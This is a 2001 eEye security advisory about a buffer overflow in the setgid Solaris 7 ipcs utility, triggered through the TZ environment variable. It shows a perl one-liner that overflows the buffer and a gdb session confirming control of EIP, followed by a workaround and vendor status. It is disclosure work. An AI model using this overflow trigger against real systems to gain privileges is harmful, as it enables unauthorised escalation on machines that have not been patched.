Date: Thu, 12 Apr 2001 18:07:08 -0700
From: Marc Maiffret <[email protected]>
To: [email protected]Subject: Solaris ipcs vulnerability
Solaris ipcs vulnerability
Release Date:
April 11, 2001
Systems Affected:
Solaris 7 (x86)
Other versions of Solaris are most likely affected also.
Discovered by:
Riley Hassell [email protected]
Description:
We have discovered a buffer overflow in the /usr/bin/i86/ipcs utility
provided with Solaris 7. The problem exists in the parsing of the TZ
(TIMEZONE) environment variable. By exploiting this vulnerability an
attacker can achieve local sys group privileges. IPCS is used for gathering
information on active inter-process communication facilities. Exploitation
of this vulnerability would be very difficult, but not impossible.
bash-2.03$ TZ=`perl -e 'print "A"x1035'`
bash-2.03$ /usr/bin/i86/ipcs
IPC status from as of Wed Apr 11 17:18:59 [buffer] 2001
Message Queue facility inactive.
T ID KEY MODE OWNER GROUP
Shared Memory:
m 0 0x500004d3 --rw-r--r-- root root
Semaphore facility inactive.
Segmentation Fault (core dumped)
Note: [buffer] is any 1036 (or so) character string. A's...
bash-2.03$ su root
Password:
# gdb /usr/bin/i86/ipcs core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
<snip>
#0 0x41414141 in ?? ()
(gdb) info reg eip
eip 0x41414141 0x41414141
(gdb)
Vendor Status:
Sun Microsystems has been contacted. They are currently working on patches
for this and other related vulnerabilities eEye has discovered.
Workaround:
chmod –s /usr/bin/i86/ipcs
This will remove the setgid bit from /usr/bin/i86/ipcs, therefore if someone
does exploit this vulnerability, they won’t gain higher privileges.
Greetings:
ADM, Ryan “shellcode ninja” Permeh, KAM, Lamagra, Zen-Parse, Loki, and last
but not least… Speakeasy.net
Copyright (c) 1998-2001 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express consent of
eEye. If you wish to reprint the whole or any part of this alert in any
other medium excluding electronic medium, please e-mail [email protected] for
permission.
Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.
Feedback
Please send suggestions, updates, and comments to:
eEye Digital Security
http://www.eEye.com[email protected]
